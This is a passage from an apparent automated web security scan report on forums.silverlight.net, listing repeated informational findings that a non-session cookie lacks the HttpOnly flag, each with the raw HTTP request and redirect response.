The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jperl.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 233
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:15 GMT; expires=Sun, 29-Jan-2012 23:16:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:15 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx"
...[SNIP]...

17.245. http://forums.silverlight.net/members/khalzoro.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/khalzoro.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:04 GMT; expires=Sun, 29-Jan-2012 23:16:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/khalzoro.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:04 GMT; expires=Sun, 29-Jan-2012 23:16:04 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:05 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.as
...[SNIP]...

17.246. http://forums.silverlight.net/members/kylemc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/kylemc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/kylemc.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx
...[SNIP]...

17.247. http://forums.silverlight.net/members/lein4d.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/lein4d.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:29 GMT; expires=Sun, 29-Jan-2012 23:16:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/lein4d.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:29 GMT; expires=Sun, 29-Jan-2012 23:16:29 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:29 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx
...[SNIP]...

17.248. http://forums.silverlight.net/members/malignate.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/malignate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/malignate.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.a
...[SNIP]...

17.249. http://forums.silverlight.net/members/mbanavige.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/mbanavige.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:19 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/mbanavige.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:19 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.a
...[SNIP]...

17.250. http://forums.silverlight.net/members/pitchai.be.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/pitchai.be.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/pitchai.be.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be.
...[SNIP]...

17.251. http://forums.silverlight.net/members/rightcoder.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/rightcoder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/rightcoder.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder.
...[SNIP]...

17.252. http://forums.silverlight.net/members/samw.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/samw.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/samw.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 232
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:34 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx">
...[SNIP]...

17.253. http://forums.silverlight.net/members/sladapter.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/sladapter.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:41 GMT; expires=Sun, 29-Jan-2012 23:15:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/sladapter.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:41 GMT; expires=Sun, 29-Jan-2012 23:15:41 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:41 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.a
...[SNIP]...

17.254. http://forums.silverlight.net/members/snelldl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/snelldl.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:35 GMT; expires=Sun, 29-Jan-2012 23:16:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/snelldl.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:35 GMT; expires=Sun, 29-Jan-2012 23:16:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:35 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.asp
...[SNIP]...

17.255. http://forums.silverlight.net/members/sniles.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/sniles.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:31 GMT; expires=Sun, 29-Jan-2012 23:16:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/sniles.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:31 GMT; expires=Sun, 29-Jan-2012 23:16:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:31 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx
...[SNIP]...

17.256. http://forums.silverlight.net/members/swo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/swo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:13 GMT; expires=Sun, 29-Jan-2012 23:16:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/swo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 231
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:13 GMT; expires=Sun, 29-Jan-2012 23:16:13 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:13 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx">h
...[SNIP]...

17.257. http://forums.silverlight.net/members/syed-amjad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/syed-amjad.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/syed-amjad.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
